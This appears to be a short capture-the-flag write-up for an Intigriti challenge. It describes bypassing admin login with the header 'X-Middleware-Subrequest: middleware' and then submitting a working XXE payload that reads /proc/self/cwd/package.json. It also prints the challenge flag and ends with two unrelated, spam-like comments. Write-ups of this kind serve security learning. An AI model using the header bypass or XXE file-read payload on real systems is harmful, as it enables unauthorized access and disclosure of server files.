Description:
The challenge was solved by chaining an authentication bypass with an XXE vulnerability. By adding the HTTP header X-Middleware-Subrequest: middleware, the application mistakenly granted access to restricted admin functionality without proper authentication. This allowed interaction with sensitive internal features that would normally require admin privileges. Using this access, an XML External Entity (XXE) payload was submitted to an XML-processing endpoint. The XXE payload was crafted to read the file package.json from the application’s current working directory via the symbolic path /proc/self/cwd/package.json. This file contained the challenge flag, confirming that both the authentication bypass and XXE were successfully exploited.
POC:
- I have bypass the login with this header X-Middleware-Subrequest: middleware directly access into admin
2. Click on Ice Cream Machines then click on view settings
3. i have used this payload in the XML Configuration Settings
4. Finally grab the flag
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///proc/self/cwd/package.json">
]>
<stockCheck><productId>&xxe;</productId></stockCheck>
Flag :
INTIGRITI{XXE_Redacted_M4ch1n3s}Reference :
Can you be more specific about the content of your article? After reading it, I still have some doubts. Hope you can help me.
I don’t think the title of your article matches the content lol. Just kidding, mainly because I had some doubts after reading the article.